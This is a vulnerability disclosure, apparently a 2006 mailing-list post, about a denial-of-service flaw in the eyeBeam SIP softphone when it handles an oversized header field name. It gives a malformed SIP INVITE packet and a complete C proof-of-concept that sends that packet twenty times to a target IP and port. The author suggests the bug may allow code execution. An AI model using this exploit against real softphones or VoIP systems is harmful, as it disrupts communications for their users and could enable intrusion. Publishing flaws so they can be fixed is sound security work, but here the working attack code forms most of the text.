eyeBeam is a SIP softphone supporting open standards for VoIP, Video and Instant Messaging. There is a vunerability in it while handing SIP header with a large field name like this: INVITE sip:a (at) 127.0.0 (dot) 1 [email concealed] SIP/2.0 Via: SIP/2.0/UDP 127.0.0.1:5060;branch=z9hG4bK00001249z9hG4bK.00004119 From: 1249 <sip:a (at) 127.0.0 (dot) 1 [email concealed]>;tag=1249 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: Receiver <sip:100012 (at) 172.16.1 (dot) 1 [email concealed]> Call-ID: 4166@<172.16.3.6> <--Change it to target IP CSeq: 18571 INVITE Expires: 1200 Max-Forwards: 70 Content-Type: application/sdp Content-Length: 130 v=0 o=1249 1249 1249 IN IP4 127.0.0.1 s=Session SDP c=IN IP4 127.0.0.1 t=0 0 m=audio 9876 RTP/AVP 0 a=rtpmap:0 PCMU/8000 If you send the packet(several times) to eyeBeam when it's starting and have no call opreation, then it will crashed for reading a unvalid address which we can control. If you send it(several times) when it's in a call, then it will be unresponse(will not dial and receive any more) or crashed for writing a address(cannot control it now, but it's possible, and as I think, it can lead to execute code). It looks like some memory operation error exists. Addtion : the lastest version is affected. ====================eyeBeam_dos.c======================== /********************************************************* eyeBeam handling SIP header DOS POC Author : ZwelL Email : zwell (at) sohu (dot) com [email concealed] Blog : http://www.donews.net/zwell Data : 2006.1.15 *********************************************************/ #include <stdio.h> #include "winsock2.h" #pragma comment(lib, "ws2_32") char *sendbuf1 = "INVITE sip:a (at) 127.0.0 (dot) 1 [email concealed] SIP/2.0rn" "Via: SIP/2.0/UDP 127.0.0.1:5060;branch=z9hG4bK00001249z9hG4bK.00004119rn" "From: test <sip:a (at) 127.0.0 (dot) 1 [email concealed]>;tag=1249rn" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaa: test <sip:a (at) 127.0.0 (dot) 1 [email concealed]>rn"; char *sendbuf2 = "CSeq: 18571 INVITErn" "Expires: 1200rn" "Max-Forwards: 70rn" "Content-Type: application/sdprn" "Content-Length: 130rn" "rn" "v=0rn" "o=1249 1249 1249 IN IP4 127.0.0.1rn" "s=Session SDPrn" "c=IN IP4 127.0.0.1rn" "t=0 0rn" "m=audio 9876 RTP/AVP 0rn" "a=rtpmap:0 PCMU/8000rn"; int main(int argc, char **argv) { WSADATA wsaData; SOCKET sock; sockaddr_in RecvAddr; char sendbuf[4096]; int iResult; int port = 8376; //default is 8376, but SIP's default port is 5060 printf("eyeBeam handling SIP header DOS POCnAuthor : ZwelLn"); printf("Email : zwell (at) sohu (dot) com [email concealed]nBlog : http://www.donews.net/zwellnn"); if(argc < 2) { printf("Usage : %s <target ip> [port]n", argv[0]); return 0; } if(argc == 3) port = atoi(argv[2]); iResult = WSAStartup(MAKEWORD(2,2), &wsaData); if (iResult != NO_ERROR) { printf("Error at WSAStartup()n"); return 0; } sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); ZeroMemory(&RecvAddr, sizeof(RecvAddr)); RecvAddr.sin_family = AF_INET; RecvAddr.sin_port = htons((short)port); RecvAddr.sin_addr.s_addr = inet_addr(argv[1]); printf("Target is : %st port is : %drn", argv[1], port); for(int i=0; i<20; i++) { sprintf(sendbuf, "%sCall-ID: 4166@<%s>rn%s", sendbuf1, argv[1], sendbuf2); if(SOCKET_ERROR == sendto(sock, sendbuf, strlen(sendbuf), 0, (SOCKADDR *) &RecvAddr, sizeof(RecvAddr))) { printf("sendto wrong:%dn", WSAGetLastError()); continue; } } printf("Now check the target is crafted?rn"); WSACleanup(); return 1; }